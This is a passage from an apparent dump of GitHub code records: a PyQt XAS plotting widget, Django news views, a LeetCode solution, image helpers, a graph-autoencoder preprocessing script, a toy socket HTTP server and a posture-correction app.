self.comboBox_data_numerator.insertItems(0, self.keys)\n # self.comboBox_data_denominator.insertItems(0, self.keys)\n # if self.last_numerator!= '' and self.last_numerator in self.keys:\n # indx = self.comboBox_data_numerator.findText(self.last_numerator)\n # self.comboBox_data_numerator.setCurrentIndex(indx)\n # if self.last_denominator!= '' and self.last_denominator in self.keys:\n # indx = self.comboBox_data_denominator.findText(self.last_denominator)\n # self.comboBox_data_denominator.setCurrentIndex(indx)\n #\n # def update_current_numerator(self):\n # self.last_numerator= self.comboBox_data_numerator.currentText()\n # print(f'Chanhin last num to {self.last_numerator}')\n #\n # def update_current_denominator(self):\n # self.last_denominator= self.comboBox_data_denominator.currentText()\n # print(f'I am there {self.last_denominator}')\n #\n # def plot_xas_data(self):\n # selected_items = (self.list_data.selectedItems())\n # update_figure([self.figure_data.ax], self.toolbar, self.canvas)\n # if self.comboBox_data_numerator.currentText() == -1 or self.comboBox_data_denominator.currentText() == -1:\n # message_box('Warning','Please select numerator and denominator')\n # return\n #\n # self.last_numerator = self.comboBox_data_numerator.currentText()\n # self.last_denominator = self.comboBox_data_denominator.currentText()\n #\n # energy_key = 'energy'\n #\n # handles = []\n #\n # for i in selected_items:\n # path = f'{self.working_folder}/{i.text()}'\n # print(path)\n # df, header = load_binned_df_from_file(path)\n # numer = np.array(df[self.comboBox_data_numerator.currentText()])\n # denom = np.array(df[self.comboBox_data_denominator.currentText()])\n # if self.checkBox_ratio.checkState():\n # y_label = (f'{self.comboBox_data_numerator.currentText()} / '\n # f'{self.comboBox_data_denominator.currentText()}')\n # 
spectrum = numer/denom\n # else:\n # y_label = (f'{self.comboBox_data_numerator.currentText()}')\n # spectrum = numer\n # if self.checkBox_log_bin.checkState():\n # spectrum = np.log(spectrum)\n # y_label = f'ln ({y_label})'\n # if self.checkBox_inv_bin.checkState():\n # spectrum = -spectrum\n # y_label = f'- {y_label}'\n #\n # self.figure_data.ax.plot(df[energy_key], spectrum)\n # self.parent.set_figure(self.figure_data.ax,self.canvas,label_x='Energy (eV)', label_y=y_label)\n #\n # self.figure_data.ax.set_xlabel('Energy (eV)')\n # self.figure_data.ax.set_ylabel(y_label)\n # last_trace = self.figure_data.ax.get_lines()[len(self.figure_data.ax.get_lines()) - 1]\n # patch = mpatches.Patch(color=last_trace.get_color(), label=i.text())\n # handles.append(patch)\n #\n # self.figure_data.ax.legend(handles=handles)\n # self.figure_data.tight_layout()\n # self.canvas.draw_idle()\n #\n #\n # def add_data_to_project(self):\n # if self.comboBox_data_numerator.currentText() != -1 and self.comboBox_data_denominator.currentText() != -1:\n # for item in self.list_data.selectedItems():\n # filepath = str(Path(self.working_folder) / Path(item.text()))\n #\n # name = Path(filepath).resolve().stem\n # df, header = load_binned_df_from_file(filepath)\n # uid = header[header.find('UID:')+5:header.find('\\n', header.find('UID:'))]\n #\n #\n # try:\n # md = self.db[uid]['start']\n # except:\n # print('Metadata not found')\n # md={}\n #\n # df = df.sort_values('energy')\n # num_key = self.comboBox_data_numerator.currentText()\n # den_key = self.comboBox_data_denominator.currentText()\n # mu = df[num_key] / df[den_key]\n #\n # if self.checkBox_log_bin.checkState():\n # mu = np.log(mu)\n # if self.checkBox_inv_bin.checkState():\n # mu = -mu\n # mu=np.array(mu)\n #\n # ds = XASDataSet(name=name,md=md,energy=df['energy'],mu=mu, filename=filepath,datatype='experiment')\n # ds.header = header\n # self.parent.project.append(ds)\n # self.parent.statusBar().showMessage('Scans added to the project successfully')\n # else:\n # message_box('Error', 'Select numerator and denominator columns')\n #\n #\n #\n #\n","repo_name":"NSLS-II-ISS/xview","sub_path":"xview/widgets/widget_xview_databroker.py","file_name":"widget_xview_databroker.py","file_ext":"py","file_size_in_byte":22591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"30005981972","text":"from django.shortcuts import render, get_object_or_404\nfrom django.views import generic\nfrom django.urls import reverse_lazy\nfrom .models import NewsStory\nfrom .forms import StoryForm\nfrom django.db.models import Q\n# from django.views.generic.edit import DeleteView\n# from http import \n\nclass IndexView(generic.ListView):\n template_name = 'news/index.html'\n context_object_name = \"all_stories\"\n\n def get_queryset(self):\n '''Return all news stories.'''\n return NewsStory.objects.all().order_by('pub_date')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n # print(context)\n # print(NewsStory.objects.all())\n context['latest_stories'] = NewsStory.objects.all().order_by('-pub_date')[:4]\n context['category_choices'] = NewsStory.CATEGORY_CHOICES\n # context['story_categories'] = NewsStory.objects.filter(category__icontains=\"Science\")\n # context['categories'] = NewsStory.objects.filter(category=\"Science\")\n return context\n \nclass CategoryView(generic.ListView):\n model = NewsStory\n template_name = 'news/science.html' \n context_object_name = 'story_categories'\n\n def 
get_queryset(self):\n        # NB: Django's generic views call get_queryset() with no extra arguments,\n        # so the category is taken from the URL kwargs here (this assumes the\n        # URL pattern captures a 'category' parameter)\n        category = self.kwargs.get('category')\n        return NewsStory.objects.filter(category=category)\n\nclass StoryView(generic.DetailView):\n    model = NewsStory\n    template_name = 'news/story.html'\n    context_object_name = 'story'\n    \n    \n\n    \n    def get(self, request, *args, **kwargs):\n        self.object = self.get_object()\n        context = self.get_context_data(object=self.object)\n        print(context)\n        fav = bool  # NB: unused; this assigns the bool type itself, not a value\n\n        if context['story'].favourited_by.filter(id=request.user.id).exists():\n            context['favourites'] = True\n\n        return self.render_to_response(context)\n\n    \n\nclass AddStoryView(generic.CreateView):\n    form_class = StoryForm\n    context_object_name = 'storyform'\n    template_name = 'news/createStory.html'\n    success_url = reverse_lazy('news:index')\n\n    def form_valid(self, form):\n        form.instance.author = self.request.user\n        return super().form_valid(form)\n    \nclass EditStoryView(generic.UpdateView):\n    model = NewsStory\n    form_class = StoryForm\n    context_object_name = 'storyform'\n    template_name = 'news/editStory.html'\n    success_url = reverse_lazy('news:index')\n\n    def form_valid(self, form):\n        form.instance.author = self.request.user\n        return super().form_valid(form) \n    \nclass DeleteStoryView(generic.DeleteView):\n    model = NewsStory \n    # form_class = StoryForm\n    context_object_name = 'storyform'\n    template_name = 'news/deleteStory.html'\n    success_url = reverse_lazy('news:index')\n\nclass SearchView(generic.TemplateView):\n    template_name = 'news/search.html'\n\nclass SearchResultsView(generic.ListView):\n    model = NewsStory\n    template_name = 'news/searchResults.html'\n    context_object_name = 'search_stories' \n    success_url = reverse_lazy('news:index') \n\n    def get_queryset(self):\n        '''Return news stories filtered by author first or last name or category'''\n        query_author = self.request.GET.get(\"author\") \n        query_category = self.request.GET.get(\"category\")\n        print(query_author, query_category)\n        if query_author is None or query_author == \"\":\n            result_set = NewsStory.objects.filter(Q(category__icontains=query_category))\n\n        elif query_category is None or query_category == \"\": \n            result_set = NewsStory.objects.filter(Q(author__last_name__icontains=query_author) | Q(author__first_name__icontains=query_author))\n        else: \n            result_set = NewsStory.objects.filter((Q(author__last_name__icontains=query_author) | Q(author__first_name__icontains=query_author)) \n                                                  & Q(category__icontains=query_category))\n        \n        # return NewsStory.objects.filter(Q(author__last_name__icontains=query_author) | Q(author__first_name__icontains=query_author) \n        #                                 | Q(category__icontains=query_category))\n        return result_set","repo_name":"trace-n/she_codes_news","sub_path":"she_codes_news/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"19736304412","text":"\"\"\"\nGiven a string, find the first non-repeating character in it and return its index. If it doesn't exist, return -1.\n\"\"\"\n
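# worked example: firstUniqChar(\"leetcode\") == 0 (the leading 'l'), firstUniqChar(\"aabb\") == -1\n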
class Solution(object):\n    def firstUniqChar(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        # Method 1: hash counting\n        # Use a hash table to record how many times each character occurs, then pick the first character whose count is 1.\n        # hashset_s = {}\n        # for i in range(len(s)):\n        #     if s[i] in hashset_s:\n        #         hashset_s[s[i]] += 1\n        #     else:\n        #         hashset_s[s[i]] = 1\n        # first_idx = len(s)\n        # for key, val in hashset_s.items():\n        #     if val == 1:\n        #         idx = s.index(key)\n        #         if idx < first_idx:\n        #             first_idx = idx\n        # if first_idx == len(s):\n        #     return -1\n        # else:\n        #     return first_idx\n        \n        # Method 2: two-pointer search\n        # Set two pointers i and j: i scans forward, and for each i, j scans from i+1 onward looking for a duplicate.\n        # If none is found, return i; otherwise continue until i reaches the end.\n        reptchar = []\n        n = len(s)\n        for i in range(n):\n            if s[i] in reptchar:\n                continue\n            for j in range(i+1, n):\n                if s[j] == s[i]:\n                    reptchar.append(s[i])\n                    break\n                if j == n-1 and s[j] != s[i]:\n                    return i\n            if i == n-1:\n                if s[i] in reptchar:\n                    return -1\n                else:\n                    return n-1\n        return -1\n\nS = Solution()\n# s = \"leetcode\"\n# print(S.firstUniqChar(s))\n# s = \"loveleetcode\"\n# print(S.firstUniqChar(s))\n# s = \"aab\"\n# print(S.firstUniqChar(s))\ns = \"aa\"\nprint(S.firstUniqChar(s))","repo_name":"sinat-jiang/leetcode","sub_path":"387-FirstUniqueCharacterInAString.py","file_name":"387-FirstUniqueCharacterInAString.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34223436520","text":"def getValue(pixel):\r\n    return int(0.299 * pixel[0] + 0.587 * pixel[1] + 0.114 * pixel[2])\r\n\r\ndef getBits(n):\r\n    n = bin(n).replace('0b','')\r\n    temp = ''\r\n    for i in range(len(n),8):\r\n        temp += '0'\r\n    temp += n\r\n    return temp\r\n\r\ndef toDecimal(bits,k):\r\n    result = 0\r\n    for i in range(k):\r\n        result += int(bits[i]) * (2 ** (7-i))\r\n    \r\n    return int(result)\r\n\r\ndef replicate(image, n=3):\r\n    img = np.copy(image)\r\n    height = img.shape[0]\r\n    \r\n    newImg = []\r\n    \r\n    n = int(n/2)\r\n    \r\n    col1 = img[:,0].reshape(height,1,3)\r\n    col2 = img[:,-1].reshape(height,1,3)\r\n    \r\n    for i,row in enumerate(img):\r\n        newImg.append([])\r\n        \r\n        for _ in range(n+1):\r\n            newImg[i].append(col1[0][0])\r\n        \r\n        for pixel in row:\r\n            newImg[i].append(pixel)\r\n        \r\n        for _ in range(n+1):\r\n            newImg[i].append(col2[0][0])\r\n    \r\n    for _ in range(n+1):\r\n        newImg.insert(0,newImg[0])\r\n        newImg.insert(-1,newImg[-1])\r\n    \r\n    return np.array(newImg,dtype='uint8')\r\n\r\n\r\ndef convlution_sum(window,matrix):\r\n    n = len(matrix)\r\n    \r\n    result = 0\r\n    for i in range(0,n):\r\n        for j in range(0,n):\r\n            result += matrix[i][j] * window[i][j]\r\n    \r\n    return result\r\n\r\ndef getNeighbours(img, row, col, n):\r\n    matrix = np.zeros((n,n,3))\r\n    \r\n    k = int((n-1)/2)\r\n    \r\n    r1 = row-k\r\n    r2 = row+k+1\r\n    \r\n    c1 = col-k\r\n    c2 = col+k+1\r\n\r\n    matrix[:] = img[r1:r2,c1:c2]\r\n    \r\n    return matrix\r\n","repo_name":"mustashrf/DIP-Basic-Functions-with-Python","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26963349872","text":"# When a class attribute and an instance attribute share a name, the class attribute can only be accessed as ClassName.attribute\n# Define the class\nclass Dog(object):\n    # Define a class attribute\n    type = '狗类'\n\n    # Define an object (instance) attribute\n    def __init__(self):\n        self.type = '二哈'\n\n\n# Create an object\nerha = Dog()\n# Get the class attribute\nprint(Dog.type)\n# Get the instance attribute
\nprint(erha.type)\n","repo_name":"LYY1998CO/Python_Advanced_Review","sub_path":"Day03/03-类属性和对象属性重名.py","file_name":"03-类属性和对象属性重名.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41781042807","text":"\"\"\"\nPreprocessing function to tokenize functions and encode ASTs in accordance with the specified GAE\n\"\"\"\n\nimport ast\nimport copy\nimport pickle\n\nimport torch\nfrom anytree import Node\nfrom datasets import load_dataset\nfrom torch_geometric.utils import train_test_split_edges\nfrom tqdm import tqdm\nfrom transformers import GPT2TokenizerFast\n\nfrom Graph_generator import ast_visit, graph_to_dict, make_graph_tensors\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'  # force CPU, overriding the CUDA check above\n\ntokenizer = GPT2TokenizerFast.from_pretrained(\"microsoft/CodeGPT-small-py\", add_prefix_space=True)\n\ndataset = load_dataset(\"code_search_net\", \"python\")\n\ninput_tokens = []\ntarget_tokens = []\nembedded_graphs = []\n\n# Loading trained model\nmodel = torch.load('GAE_models/GAE')\nmodel.eval()\nmodel.to(device)\n\nsplit_type = \"validation\"\ndataset_size = 5000  # Number of functions to process\n\nfor i, function in tqdm(enumerate(dataset[split_type])):\n\n    if i > dataset_size:\n        break\n\n    # Extracting strings and tokens from dataset\n    function_string = function['func_code_string']\n    function_tokens = function['func_code_tokens']\n\n    pre_tokens = tokenizer(function_tokens, is_split_into_words=True)\n\n    # Discarding tokens over 784 in length (not needed for current LSTM downstream application)\n    if len(pre_tokens.data['input_ids']) < 784:\n\n        split_ratio = 0.9  # This is not needed for the current configuration, yet is splitting the function at 90%\n        tokens = pre_tokens.data['input_ids']\n        split_id = int(len(tokens) * split_ratio)\n\n        target_token = tokens[split_id]\n        input_token = tokens[:split_id]\n\n        # AST Generation\n        ast_dicts = []\n        try:\n            # Generating and walking AST graph\n            ast_graph = ast_visit(ast.parse(function_string), parent_node=Node(\"Root\"))\n            ast_dict = graph_to_dict(ast_graph)\n            ast_dicts.append(ast_dict)\n            ast_graph_tensor = make_graph_tensors(ast_dicts)[0]\n            graph_2 = copy.deepcopy(ast_graph_tensor)\n\n            # Preparing data\n            x = graph_2.x.to(device)\n            data = train_test_split_edges(graph_2, test_ratio=1, val_ratio=0)\n\n            # Forward pass\n            z = model.encode(x, data.test_pos_edge_index.to(device))\n\n            # Appending only on successful AST generation\n            input_tokens.append(input_token)\n            target_tokens.append(target_token)\n            embedded_graphs.append(z)\n\n        except (SyntaxError, TypeError):\n            # Occasionally the functions cannot be compiled and will throw syntax or type errors\n            # (the tuple form is needed: `except SyntaxError or TypeError` would only catch SyntaxError)\n            pass\n\n# Collating and saving data for downstream training of the predictor model\ndata = (input_tokens, target_tokens, embedded_graphs)\nwith open('{}_data(input_target_z).pkl'.format(split_type), 'wb') as handle:\n    pickle.dump(data, handle)","repo_name":"notsamdonald/Code-Prediction","sub_path":"Predictor_preprocessor.py","file_name":"Predictor_preprocessor.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9007099453","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n# author:joel 19-11-11\n\n\"\"\"\nA web service implemented with raw sockets\nTopic: Python socket programming, communication, and sockets\n\"\"\"\n\nimport socket\n\nEOL1 = b'\\\\n\\\\n'\nEOL2 = b'\\\\n\\\\r\\\\n'\nbody = '''Hello, world!

from the5fire 《Django企业开发实战》

'''\nresponse_params = [\n    'HTTP/1.0 200 OK',\n    'Date: Sun, 27 may 2019 01:01:01 GMT',\n    'Content-Type: text/html;charset=utf-8',\n    'Content-Length: {}\\\\r\\\\n'.format(len(body.encode())),\n    body,\n]\nresponse = '\\\\r\\\\n'.join(response_params)\n\n\ndef handle_connection(conn, addr):\n    print('oh, new conn', conn, addr)\n    import time\n    time.sleep(20)\n    request = b\"\"\n    while EOL1 not in request and EOL2 not in request:\n        request += conn.recv(1024)\n    print(request)\n    # encode the response to bytes before sending\n    conn.send(response.encode())\n    conn.close()\n\n\ndef main():\n    # socket.AF_INET is used for network communication between hosts\n    # socket.SOCK_STREAM is used for TCP-based stream socket communication\n    serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    # allow the port to be reused, so the server restarts quickly after each Ctrl+C\n    serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    serversocket.bind(('127.0.0.1', 8000))\n    # set the backlog -- the maximum number of queued socket connections\n    serversocket.listen(5)\n    print('http://127.0.0.1:8000')\n\n    try:\n        while True:\n            conn, address = serversocket.accept()\n            handle_connection(conn, address)\n    finally:\n        serversocket.close()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"joelYing/SpiderBar","sub_path":"JangGou/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"2"} +{"seq_id":"39574266336","text":"import sys\nimport pandas as pd\nimport time\nimport pygame\nimport datetime as dt\nimport math\nimport csv\nimport numpy as np\nimport mediapipe as mp\nimport cv2\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, \\\\\n    QLabel, QLineEdit, QMessageBox, QVBoxLayout, QFileDialog, QGraphicsScene, QGraphicsView\nfrom PyQt5 import QtCore, QtGui\nfrom PyQt5.QtGui import QImage, QPixmap, QPen\nfrom PyQt5.QtCore import QTimer\nfrom ctypes import *\nimport matplotlib.pyplot as plt\n\nWIDTH = windll.user32.GetSystemMetrics(0)\nHEIGHT = windll.user32.GetSystemMetrics(1)\n\nFLAG = False\n\npygame.init()\n\ncount = 0\n\nwith open(\"data.csv\", \"r\") as file:\n    reader = csv.reader(file)\n    lines = list(reader)\n    day, today, my_time, exercise_count = lines[-1]\n\nFLAG_DATE = False\nif today != str(dt.date.today()):\n    day = int(day)\n    day += 1\n    FLAG_DATE = True\n    my_time = int(my_time)\n    my_time = 0\n    exercise_count = int(exercise_count)\n    exercise_count = 0\n    today = dt.date(2003, 2, 24)\n    today = dt.date.today()\n\n\ndef skeleton_recognition():\n    global global_cap\n    global FLAG\n    global count\n    mp_drawing = mp.solutions.drawing_utils\n    mp_pose = mp.solutions.pose\n\n    delt_code_1_1 = 0.05\n    delt_code_1_2 = 0.02\n    delt_angle_max = 105\n    delt_angle_min = 75\n    delt_code_3_1 = 0.04\n\n\n\n    time_11 = 0\n    time_12 = 0\n    time_31 = 0\n    time_32 = 0\n    time_4 = 0\n\n    waiting_time = 100\n\n    min_spine_length = 0.0\n\n    code_11 = '11'\n    code_12 = '12'\n    code_31 = '31'\n    code_32 = '32'\n    code_4 = '4'\n    code_0 = '0'\n    code_1 = '1'\n\n    def calculate_angle(a, b, c):\n        a = np.array(a)  # first point\n        b = np.array(b)  # second point\n        c = np.array(c)  # third point\n\n        radians = np.arctan2(c[1] - b[1], c[0] - b[0]) - np.arctan2(a[1] - b[1], a[0] - b[0])\n        angle = np.abs(radians * 180.0 / np.pi)\n\n        if angle > 180.0:\n            angle = 360 - angle\n\n        return angle\n\n    cap = global_cap\n\n\n    with mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:  # set the detection/tracking confidence thresholds\n        while FLAG:\n            if count == 0:\n                flag_spine = False\n            count += 1\n            ret, frame = cap.read()\n\n            
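# note: OpenCV delivers frames in BGR channel order, while MediaPipe Pose expects RGB\n            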
# convert the color to RGB format\n            image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n            image.flags.writeable = False  # read-only\n\n            # run detection\n            results = pose.process(image)\n\n            # convert the color back\n            image.flags.writeable = True  # writable again\n            image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n            try:\n                landmarks = results.pose_landmarks.landmark  # use only the actually detected points (out-of-range points are not returned)\n                # ------------------landmark coordinates\n                left_shoulder = [landmarks[mp_pose.PoseLandmark.LEFT_SHOULDER].x,\n                                 landmarks[mp_pose.PoseLandmark.LEFT_SHOULDER].y]\n                right_shoulder = [landmarks[mp_pose.PoseLandmark.RIGHT_SHOULDER].x,\n                                  landmarks[mp_pose.PoseLandmark.RIGHT_SHOULDER].y]\n\n                left_hip = [landmarks[mp_pose.PoseLandmark.LEFT_HIP].x, landmarks[mp_pose.PoseLandmark.LEFT_HIP].y]\n                right_hip = [landmarks[mp_pose.PoseLandmark.RIGHT_HIP].x, landmarks[mp_pose.PoseLandmark.RIGHT_HIP].y]\n\n                left_ear = [landmarks[mp_pose.PoseLandmark.LEFT_EAR].x, landmarks[mp_pose.PoseLandmark.LEFT_EAR].y]\n                right_ear = [landmarks[mp_pose.PoseLandmark.RIGHT_EAR].x, landmarks[mp_pose.PoseLandmark.RIGHT_EAR].y]\n                nose = [landmarks[mp_pose.PoseLandmark.NOSE].x, landmarks[mp_pose.PoseLandmark.NOSE].y]\n\n\n                left_knee = [landmarks[mp_pose.PoseLandmark.LEFT_KNEE].x, landmarks[mp_pose.PoseLandmark.LEFT_KNEE].y]\n                right_knee = [landmarks[mp_pose.PoseLandmark.RIGHT_KNEE].x,\n                              landmarks[mp_pose.PoseLandmark.RIGHT_KNEE].y]\n\n                left_ankle = [landmarks[mp_pose.PoseLandmark.LEFT_ANKLE].x,\n                              landmarks[mp_pose.PoseLandmark.LEFT_ANKLE].y]\n                right_ankle = [landmarks[mp_pose.PoseLandmark.RIGHT_ANKLE].x,\n                               landmarks[mp_pose.PoseLandmark.RIGHT_ANKLE].y]\n\n                # ------------------drawing the spine midline\n                # draw the midpoint of the shoulder girdle\n                avg_point_shoulder = (\n                    (left_shoulder[0] + right_shoulder[0]) / 2, (left_shoulder[1] + right_shoulder[1]) / 2)\n                cv2.circle(image,\n                           (int(avg_point_shoulder[0] * frame.shape[1]), int(avg_point_shoulder[1] * frame.shape[0])),\n                           5,\n                           (0, 0, 255), -1)\n                # draw the midpoint of the pelvic girdle\n                avg_point_hip = ((left_hip[0] + right_hip[0]) / 2, (left_hip[1] + right_hip[1]) / 2)\n                cv2.circle(image,\n                           (int(avg_point_hip[0] * frame.shape[1]), int(avg_point_hip[1] * frame.shape[0])), 5,\n                           (0, 0, 255),\n                           -1)\n\n                cv2.line(image,\n                         (int(avg_point_shoulder[0] * frame.shape[1]), int(avg_point_shoulder[1] * frame.shape[0])),\n                         (int(avg_point_hip[0] * frame.shape[1]), int(avg_point_hip[1] * frame.shape[0])), (255, 0, 0),\n                         2)\n\n                # ---------------------------------------------------------------------------------3: back control\n                # determine the reference spine length (used to detect slouching)\n\n                while flag_spine != True:\n                    local_flag = True\n                    if local_flag:\n                        print(code_0)\n                        pygame.mixer.music.load(\"Voices/code_0.mp3\")\n                        pygame.mixer.music.play()\n                        pygame.time.wait(4000)\n                        pygame.mixer.music.stop()\n                        time.sleep(5)\n                        local_flag = False\n                    min_spine_length = math.sqrt(\n                        (avg_point_shoulder[0] - avg_point_hip[0]) ** 2 + (\n                                avg_point_shoulder[1] - avg_point_hip[1]) ** 2)\n                    print(code_1)\n                    pygame.mixer.music.load(\"Voices/code_1.mp3\")\n                    pygame.mixer.music.play()\n                    pygame.time.wait(2000)\n                    pygame.mixer.music.stop()\n                    flag_spine = True\n\n                if abs(math.sqrt((avg_point_shoulder[0] - avg_point_hip[0]) ** 2 + (\n                        avg_point_shoulder[1] - avg_point_hip[1]) ** 2) - min_spine_length) < delt_code_3_1:\n                    time_31 += 1\n                    if time_31 > waiting_time:\n                        print(code_31)\n                        pygame.mixer.music.load(\"Voices/code_31.mp3\")\n                        pygame.mixer.music.play()\n                        pygame.time.wait(4000)\n                        pygame.mixer.music.stop()\n                        time_31 = 0\n                else:\n                    time_31 = 0\n                    count += 1\n\n                # compute the angle between the torso and the legs
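\n                # (a neutral upright posture keeps the hip angles near 90 degrees, inside the allowed [75, 105] band)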
между туловищем и ногами\n angle_l_spine = calculate_angle(left_shoulder, left_hip, left_knee)\n angle_r_spine = calculate_angle(right_shoulder, right_hip, right_knee)\n\n if angle_l_spine > delt_angle_max or angle_l_spine < delt_angle_min or angle_r_spine > delt_angle_max or angle_r_spine < delt_angle_min:\n time_32 += 1\n if time_32 > waiting_time:\n print(code_32)\n pygame.mixer.music.load(\"Voices/code_32.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(5000)\n pygame.mixer.music.stop()\n time_32 = 0\n else:\n time_32 = 0\n count += 1\n\n # ---------------------------------------------------------------------------------1 контроль головы\n # приблизительно одна прямая уха и средней точки плечевого пояса\n\n if abs(avg_point_shoulder[0] - right_ear[0]) > delt_code_1_1 or abs(\n avg_point_shoulder[0] - left_ear[0]) > delt_code_1_1:\n time_11 += 1\n if time_11 > waiting_time:\n print(code_11)\n pygame.mixer.music.load(\"Voices/code_11.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(2000)\n pygame.mixer.music.stop()\n time_11 = 0\n else:\n time_11 = 0\n count += 1\n\n # приблизительно одна прямая уха и носа\n\n if abs(nose[1] - right_ear[1]) > delt_code_1_2 or abs(nose[1] - left_ear[1]) > delt_code_1_2:\n time_12 += 1\n if time_12 > waiting_time:\n print(code_12)\n pygame.mixer.music.load(\"Voices/code_12.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(2000)\n pygame.mixer.music.stop()\n time_12 = 0\n else:\n time_12 = 0\n count += 1\n\n # ---------------------------------------------------------------------------------4 контроль ног\n\n # считаем угол по трем точкам\n angle_l_foot = calculate_angle(left_hip, left_knee, left_ankle)\n angle_r_foot = calculate_angle(right_hip, right_knee, right_ankle)\n\n # выводим угол в поток изображения\n\n if angle_l_foot > delt_angle_max or angle_l_foot < delt_angle_min or angle_r_foot > delt_angle_max or angle_r_foot < delt_angle_min:\n time_4 += 1\n if time_4 > waiting_time:\n print(code_4)\n pygame.mixer.music.load(\"Voices/code_4.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(4000)\n pygame.mixer.music.stop()\n time_4 = 0\n else:\n time_4 = 0\n count += 1\n\n\n except: # если у нас есть не все точки или появилась какая-то ошибка, то мы не разрываем цикл, а просто его пропускаем\n pass\n\n # рисуем в image результаты обнаружения (точки) и соединения, устанавливая цвет и размеры\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_pose.POSE_CONNECTIONS,\n mp_drawing.DrawingSpec(color=(245, 117, 66), thickness=2, circle_radius=2),\n mp_drawing.DrawingSpec(color=(245, 66, 230), thickness=2, circle_radius=2)\n )\n\n cv2.imshow('Mediapipe Feed', image)\n if cv2.waitKey(10) & 0xFF == ord('q'):\n break\n\n\n cv2.destroyAllWindows()\n\n\nclass PageMain(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setStyleSheet(\"background-color: #264653;\")\n self.setGeometry(0, 0, WIDTH, HEIGHT)\n self.setWindowTitle('Коррекция осанки')\n\n self.btn_progress = QPushButton(\"Посмотреть прогресс\", self)\n self.btn_progress.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 + 50, WIDTH - 200 - WIDTH / 2, 50)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.btn_progress.setFont(font)\n self.btn_progress.setStyleSheet(\"background-color: #f4a261;\\n\"\n \"border-radius: 10px;\")\n self.btn_progress.setObjectName(\"btn_progress\")\n self.btn_progress.clicked.connect(self.open_page_progress)\n\n self.btn_do_exer 
= QPushButton('Выполнить упражнения', self)\n self.btn_do_exer.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 + 110, WIDTH - 200 - WIDTH / 2, 50)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.btn_do_exer.setFont(font)\n self.btn_do_exer.setStyleSheet(\"background-color: #f4a261;\\n\"\n \"border-radius: 10px;\")\n self.btn_do_exer.setObjectName(\"btn_do_exer\")\n self.btn_do_exer.clicked.connect(self.open_page_exercise)\n\n self.btn_parent = QPushButton(\"Родительский режим\", self)\n self.btn_parent.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 + 170, WIDTH - 200 - WIDTH / 2, 50)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.btn_parent.setFont(font)\n self.btn_parent.setStyleSheet(\"background-color: #e9c46a;\\n\"\n \"border-radius: 10px;\")\n self.btn_parent.setObjectName(\"btn_parent\")\n self.btn_parent.clicked.connect(self.open_page_input_pw)\n\n self.lbl_molod = QLabel('Ты сегодня сидишь правильно ' + str(my_time) + ' минут!', self)\n self.lbl_molod.setGeometry(WIDTH / 2 + 120, HEIGHT / 2 - 50, WIDTH - 180 - WIDTH / 2, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_molod.setFont(font)\n self.lbl_molod.setStyleSheet(\"color: #ffffff\")\n self.lbl_molod.setObjectName(\"lbl_molod\")\n\n self.btn_start = QPushButton('CТАРТ', self)\n self.btn_start.setStyleSheet(\"background-color: #2a9d8f;\"\n \"color: rgb(255, 255, 255);\"\n \"border-radius: 10px;\")\n self.btn_start.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 - 250, 200, 70)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.btn_start.setFont(font)\n self.btn_start.setObjectName(\"btn_start\")\n self.btn_start.clicked.connect(self.push_on)\n\n self.btn_stop = QPushButton('СТОП', self)\n self.btn_stop.setStyleSheet(\"background-color: #e76f51;\"\n \"color: #ffffff;\"\n \"border-radius: 10px;\")\n self.btn_stop.setGeometry(WIDTH - 100 - 200, HEIGHT / 2 - 250, 200, 70)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setBold(True)\n font.setPointSize(18)\n 